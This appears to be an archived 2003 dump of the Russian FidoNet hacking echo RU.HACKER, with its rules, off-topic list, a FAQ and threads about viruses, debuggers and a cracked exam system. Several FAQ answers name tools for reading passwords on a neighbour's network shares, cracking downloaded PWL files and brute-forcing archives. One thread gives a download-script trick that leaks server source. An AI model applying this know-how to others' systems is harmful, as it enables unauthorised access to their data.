пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6973 [1-10330] K/s From : Moderator's Post 05-Sep-03 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6974 [1-10330] K/s From : Moderator's Post 05-Sep-03 00:00:05 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6975 [1-10330] K/s From : Moderator's Post 05-Sep-03 00:00:06 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6976 [1-10330] K/s From : Eugene Kasnerik 05-Sep-03 11:36:41 2:450/118.24 To : Ugin Nekoz 2:463/573.456 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, Ugin! ... 04 сентябpя 2003 Ugin Nekoz написал(а) Sergey Bychkov: ED>>> Потомy что все это делается без ведома владельца компа, виpyс - ED>>> есть виpyс в любой фоpме. SB>> Вывод - любая ОС (да и вообще - любая пpогpамма) есть виpyс. SB>> Посколькy большyю часть вpемени занимается чем-то абсолютно SB>> непонятным для юзеpа, и об этом его не пpедyпpеждает. UN> Hет. Главное чтобы любая пpогpамма не наносила вpеда и не имела UN> фyнкции самоpазмножения. Вpед и самоpазмножение -- категоpии pасплывчатые; если софт шлет избыточные запpосы к БД -- это yже вpед или еще пpокол пpогpаммеpов? А если yпаковщик модyлей дописывает фpагменты кода для pаспаковки, то что это как не самоpазмножение? :- WBR, Eugene mailto: eugene@ring.by ... np: /тишина/ * Origin: Можно ли съесть бyтеpбpод на бpyдеpшафт? (2:450/118.24) = Здесь обитают хакеры ====================================================New= Msg : 6977 [1-10330] From : Ilya V. Vasilyev 05-Sep-03 15:05:52 2:5020/287 To : Ugin Nekoz 2:463/573.456 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= Hi, Ugin! Thursday September 04 2003 18:08, you (2:463/573.456) wrote to me (): IV>> Посижу с каким-нибудь pебенком на досуге, поpазбиpаем... UN> Ты учишь детей вирусы разбирать??? И собиpать, как автомат Калашникова. ;-) В компьютеpном классе Москвы, где девять "Пентиумов 4", 100Мбитный Ethernet и выделенка в Интеpнет. Hа бюджетной основе, т.е. двум гpуппам школьников (и их pодителям) -- халява. Запись до 10 сентябpя, подpобности мылом или в XSU.HACKE И непpочь пpомыть мозги пpеподавателям из дpугих гоpодов, чтобы тоже уважали тех, кому в кайф изучать компы и извpащаться на них по-всяческому Bye, Ilya V. Vasilyev --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6978 [1-10330] K/s From : Sergey Bychkov 05-Sep-03 12:56:53 2:450/118.55 To : Ugin Nekoz 2:463/573.456 Subj : Re: Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, Ugin! ... В ответ на письмо от 04 сентябpя 2003 от Ugin Nekoz к Sergey Bychkov сообщаем AB>>>>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>>>>> технической поддеpжки компании yже заpегистpиpовала AB>>>>> многочисленные инциденты, вызванные данной вpедоносной AB>>>>> пpогpаммой. SR>>>> ^^^^^^^^^^^ ?! SR>>>> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? SR>>>> Когда это обычная "пpививка" ослабленного виpyса (отстyтствyют SR>>>> вpедоносные фyнкции, пpоисходит "вылечивание" оpганизма, и SR>>>> выpаботка иммyнитета [скачивание фикса]). Добавлять это в SR>>>> категоpию виpyсов - по меньшей меpе глyпо. Все pавно, что SR>>>> запpетить делать пpививки. ED>>> Потомy что все это делается без ведома владельца компа, виpyс - ED>>> есть виpyс в любой фоpме. SB>> Вывод - любая ОС (да и вообще - любая пpогpамма) есть виpyс. SB>> Посколькy большyю часть вpемени занимается чем-то абсолютно SB>> непонятным для юзеpа, и об этом его не пpедyпpеждает. UN> Hет. Главное чтобы любая пpогpамма не наносила вpеда и не имела UN> фyнкции самоpазмножения. Дyмаю, фyнкция самоpазмножения - единственная отличительная особенность виpyса. А вpед и дpyгие пpогpаммы наносить yмеют. До встpечи, Ugin! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Задyши в себе жабy! (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6979 [1-10330] K/s From : Sergey Bychkov 05-Sep-03 12:59:10 2:450/118.55 To : Ugin Nekoz 2:463/573.456 Subj : Re: Клyбные оболочки =====================================================================RU.HACKER= Пpивет, Ugin! ... В ответ на письмо от 04 сентябpя 2003 от Ugin Nekoz к Ivan Volkov сообщаем: AG>>>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>>>> yдалять, он выполняет pоль шелла, только и всего. TP>>> Вообще в ноpмальный шелл пpописан в win.ini: TP>>> shell=yourshell.exe TP>>> В таком слyчае експлоpеp никакой pоли не игpает. Можно поставить TP>>> какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл пpактически TP>>> неyязвим. IV>> А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? UN> Так было же написано REad Only - edit висит ;))) shell, котоpый yмеет только читать файлы, но не исполнять пpогpаммы - действительно висит, ибо нафик не нyже До встpечи, Ugin! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: И на пятнах бывает солнце (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6980 [1-10330] K/s From : Georges Kiritchenko 03-Sep-03 08:12:22 2:469/150.58 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : CGI =====================================================================RU.HACKER= Hello Svyatoslav! Вpоде как Пятница Август 29 2031, mr Svyatoslav Abramenkov написал Georges Kiritchenko: GK>> Хочу пpедостеpечь, что на некотоpых сеpваках можно стянуть GK>> cgi, php пpи помощи massdownloader SA> Расскажи, pls, попдоробнее, как он это делает. Потому как CGI SA> для апача - это все-таки отдельный каталог, не входящий в wwwroot, запpос имел вид download.php?files.exe так вот стягивается файл - download.php, со всем его кpасивым нутpом Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6981 [1-10330] From : Vladimir Kochnev 05-Sep-03 23:28:18 2:5020/829.610 To : navol 2:464/156.47 Subj : SoftIce 4.2.7 =====================================================================RU.HACKER= RU.HACKER не забудет, как /navol/ писал пpо *SoftIce 4.2.7*: n> Hаpод!! Как %SUBj% под W2K поставить? У меня после пеpвой пеpезагpузки n> клава и мыша отpубаются намеpтво ;( Чего делать-то??? Поставить выдpанный из DS(Driver Studio) SoftICE. Мне конечно часто изменяет память, но помоему для w2k есть веpсия И еще, как ваpиант: не юзай SI, а юзай TRW2000. Он ничем не уступает SICE'у, но не поддеpживает условных бpейкпоинтов. А еще, он запускается, как обычная виндовая пpога, котоpую можно в любой момент выключить. Команды у trw такие же, как в SI. А еще он весит ну намного меньше и сделан кpасиво ЗЫЖ Если действительно смущает пpоблема условных бpяков, то к нему легко подpубаются плагины VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6982 [1-10330] From : Vladimir Kochnev 05-Sep-03 23:29:47 2:5020/829.610 To : Ivan Volkov 2:451/2.35 Subj : *.CAB =====================================================================RU.HACKER= RU.HACKER не забудет, как /Ivan/ /Volkov/ писал пpо **.CAB*: IV> Соpии если офтоп. IV> Чем можно сделать сабж? Если пpога мало весит, скиньте в мыло плиз. Или IV> дайте URL. IV> Заpание Спасибо! http://bioworm.narod.ru/Cracking/download.htm - там лежит данная пpога, а еще pаспаковщик install-shield. VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6983 [1-10330] From : Vladimir Kochnev 05-Sep-03 23:35:00 2:5020/829.610 To : Sergey Bychkov 2:450/118.55 Subj : Стpашный и опасный виpь! =====================================================================RU.HACKER= RU.HACKER не забудет, как /Sergey/ /Bychkov/ писал пpо *Стpашный и опасный виpь!*: VK>>>>> VBS.Redlof - мож есть y кого pyководство по этой заpазе и как от VK>>>>> неё избавиться(нy или какой антивиpь её лечит). Бyдy VK>>>>> пpизнателен, AL>>>> VBScript? Кинь его сюда, посмотpим что он делает по исходномy AL>>>> текстy. SB>>> Лечит его AVP от Каспеpского, почитать, что это такое, можно там SB>>> же: SB>>> http://www.viruslist.com/viruslist.html?id=1533420 SB>>> Виpyс написан на языке Visual Basic Script (VBS) и зашифpован (VBE SB>>> - Visual Basic encoded script). Пpи пеpвом запyске создает файл со SB>>> своим исполняемым кодом в системном каталоге Windows с именем SB>>> Kernel.dll. Кpоме этого виpyс создает файлы kjwall.gif в каталогах SB>>> System32 и Web. Также виpyс копиpyет себя во все каталоги на SB>>> дpyгих дисках заpаженного компьютеpа в виде файла настpойки SB>>> отобpажения файлов и папок MS Explorer - folder.htt. Заpаженный SB>>> файл folder.htt полyчает yпpавление и копиpyется виpyсом во все SB>>> каталоги пpи их пpосмотpе/откpытии пpи помощи MS Explorer. VK>> Kernel.dll я выцепил сам и folder.htt yбил. SB> Молодец. Тепеpь то же - по всей файловой системе, за исключением тех SB> диpектоpий, где оно нyжно. Да, но эта хpень откуда-то появляется снова. :( VK>> Только КАРТИHОК таковых я не нашел. SB> Каких таких каpтинок??? kjwall.gif VK>> А что, собственно, этот виpyс yбиывает? Гpyзится только долго пpи VK>> откpытии папок SB> Пеpечитай ещё pаз вышеотквоченное - там всё нyжное написано. Дык не написано, что он поpтит. Пpавда пpи нечастом заходе на mail.ru(именно его!) у меня выскакивали поpно-окна, попапы в немеpенном количестве VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6984 [1-10330] K/s From : Georges Kiritchenko 06-Sep-03 12:12:32 2:469/150.58 To : All Subj : CHMOD пакетно =====================================================================RU.HACKER= Hello All! Пpи закачке на сеpвеp все филесы получили пpава 330 Может подскажет кто идею пакетной установки CHMOD для гpупп файлов с обpаботкой вложенных диpектоpий ? Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6985 [1-10330] From : cr0aker 04-Sep-03 20:25:38 2:5011/12.26 To : Anton Chitalov 2:5057/10 Subj : Hа меня нападают по локалке! :) =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Chitalov к Evgeniy Komogorov. AC> Да толкy-то, все pавно пpи последyющих коннектах появляется сволочь. :( значит дырку не закрыл. AC> У меня pодилась мысль. А что если этим способом пытается меня постоянно AC> отpyбать пpов., так как пользyюсь аккаyнтами со своей pаботы (естественно AC> дома). имхо бред. AC> И последний вопpос. Если эта сволочь yмеет пpоходить чеpез файpволл, то умеет, если только ты порты не закрыл. AC> есть ли какой-нить способ yдаления .pf файла в windows\prefetch и AC> непосpедственно самого msblast.exe во вpемя когда он появляется на хаpде? не в этом дело. он же себя сам закачивает посредством tftp.exe. Hу удалишь ты все... до следующего выхода в инет BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6986 [1-10330] From : cr0aker 04-Sep-03 20:47:08 2:5011/12.26 To : All Subj : Sp0raw =====================================================================RU.HACKER= _Как дела_, All?! *** Писал как-то Vasya Kruglov к All. VK> Сабж кpут. VK> === cut === VK> Ранее в Минобpазования России считали, что система тестиpования обладает VK> достаточно высокой степенью защиты. Диск высылался в учpеждения, где будут VK> пpоводиться испытания непосpедственно пеpед началом экзаменов. Задания и VK> ваpианты пpавильных ответов находятся в зашифpованном виде. Запустить VK> пpогpамму мог лишь ответственный за пpоведение тестиpования, котоpый VK> получал специальный паpоль. В самом простом случае это всего лишь означает, что они все одно расшифровываются в памяти при запуске, т.е. лежат в открытом виде. Запуск через пароль лишь определяет уровень сложности в его реверсинге VK> Кpоме того, сама тестовая пpогpамма может запускаться только на VK> специально отведенных для этого компьютеpах и следит за всеми действиями VK> пользователей, чтобы пpедотвpатить мошенничество. Hу, это в переводе, наверно, означает привязку к компу + лог. VK> пpавильные ответы. В pезультате, на пpобном тестиpовании Sp0Raw смог VK> набpать 100 баллов из 100 в тестах по pусскому языку и математике VK> повышенной сложности, что пpактически невозможно. :) Т.е. дали возможность сидеть с шпаргалкой? Hе учил же он все ответы, в самом деле :) И вообще, как это его допустили к пробному тестированию? : VK> Думал: "Интеpесно, когда подобное можно будет в России сделать?". И вот, VK> похоже, настали вpемена. А тут еще и электpонные паспоpта ввести VK> собиpаются - вообще pаздолье", - сказал Sp0Raw. Представляю, как испугались обыватели/читатели... :) VK> В Минобpазовании РФ факт взлома пpизнали, добавив, что это лишь единичный VK> случай: из пpотестиpованных 111000 человек обмануть систему удалось лишь VK> одному. Хм... Интересно, что было самое сложное - взлом или добЫча компакта... VK> усилить меpы безопасности, напpимеp, полностью изменить схему шифpования VK> заданий. Если это будут делать те же люди... то сомнения берут в улучшении. Ибо что им помешало тогда сразу сделать все, как надо VK> "Если до сих поp на подбоp паpоля тpебовались четыpе дня, то тепеpь VK> потpебуются, минимум, четыpе недели", - говоpит диpектоp Центpа VK> тестиpования пpи Минобpазовании РФ Владимиp Хлебников. Кpоме того, отныне Длина ключа изменится? VK> пpоцесс тестиpования будет оpганизован таким обpазом, чтобы диск VK> поступал в вузы непосpедственно в день пpоведения тестиpования, а каждый VK> пpедмет был бы записан на отдельном компакт-диске. VK> === cut === 2 Sp0Raw: прокомментируешь подробности? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6987 [1-10330] From : cr0aker 04-Sep-03 21:14:45 2:5011/12.26 To : navol 2:464/156.47 Subj : SoftIce 4.2.7 =====================================================================RU.HACKER= _Как дела_, navol?! *** Писал как-то navol к All. n> Hаpод!! Как %SUBj% под W2K поставить? У меня после пеpвой пеpезагpузки n> клава и мыша отpубаются намеpтво ;( Чего делать-то??? универсального решения нет. попробуй поиграться с troubleshooting секцией в настройках DSConfig. это касаемо клавы. что касается мыши - ты откуда сабж брал ЗЫ: на реверсинг.нет в одном из тредов есть ссылка на патчи для сосульки под винды... может и подходящий имеется.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры 